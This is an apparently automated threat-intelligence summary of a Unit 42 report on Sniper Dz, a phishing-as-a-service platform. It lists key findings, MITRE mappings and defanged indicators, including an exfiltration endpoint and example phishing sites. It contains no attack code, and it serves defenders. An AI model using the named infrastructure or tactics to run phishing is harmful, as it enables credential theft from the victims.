An in-depth look at Sniper Dz, a phishing-as-a-service platform that targets social media and online services, revealing its wide reach with over 140,000 phishing sites linked to it in the last year. The platform offers a free admin panel to generate pages, hosts content behind public proxies, and centralizes credential exfiltration and victim tracking. #SniperDz #Raviral
Keypoints
- Sniper Dz is a popular PhaaS platform with thousands of subscribers on Telegram.
- Over 140,000 phishing websites have been discovered associated with Sniper Dz in the past year.
- The platform offers an admin panel for phishers to generate and host phishing pages.
- Phishing pages can be hosted on Sniper Dzβs infrastructure or downloaded for self-hosting.
- Sniper Dz uses public proxy servers to hide phishing content and evade detection.
- Phishers can exploit legitimate SaaS platforms to host phishing pages, making detection harder.
- Stolen credentials are exfiltrated to a centralized infrastructure controlled by Sniper Dz.
MITRE Techniques
- [T1566] Phishing β Phishing attacks are facilitated through the Sniper Dz platform, which provides templates and hosting for phishing pages. βPhishing attacks are facilitated through the Sniper Dz platform, which provides templates and hosting for phishing pages.β
- [T1003] Credential Dumping β Stolen credentials are exfiltrated to a centralized endpoint controlled by Sniper Dz. βStolen credentials are exfiltrated to a centralized endpoint controlled by Sniper Dz.β
- [T1027] Obfuscated Files or Information β Phishing template code is heavily obfuscated to evade detection. βPhishing template code is heavily obfuscated to evade detection.β
- [T1090] Use of External Proxy β Sniper Dz uses public proxy servers to hide the backend servers hosting phishing content. βSniper Dz uses public proxy servers to hide the backend servers hosting phishing content.β
Indicators of Compromise
- [Domain] Sniperdz[.]com β Sniper Dz PhaaS Platform.
- [Proxy/Domain] proxymesh[.]com β Public proxy service used to hide phishing content.
- [Domain] raviral[.]com/k_fac.php β Centralized exfiltration endpoint.
- [URL] raviral[.]com/host_style/style/js-track/track.js β Embedded tracker script.
- [Telegram] t[.]me/JokerDzV2 β Telegram support channel.
- [Telegram] t[.]me/JokerDzV2/19 β Tutorial video link.
- [Domain] raviral[.]com β Redirection to Sniper Dz-owned websites.
- [Domain] 6627c220b5daa507c6cca1c5βvotedme[.]netlify.app β Example phishing site.
- [Domain] automaticgiveaway[.]000webhostapp[.]com β Example phishing site.
- [Domain] Climbing-green-botany[.]glitch[.]me β Example phishing site.
- [Domain] facebookbusiness0078[.]blogspot[.]be β Blogspot hosting phishing pages.
Read more: https://unit42.paloaltonetworks.com/phishing-platform-sniper-dz-unique-tactics/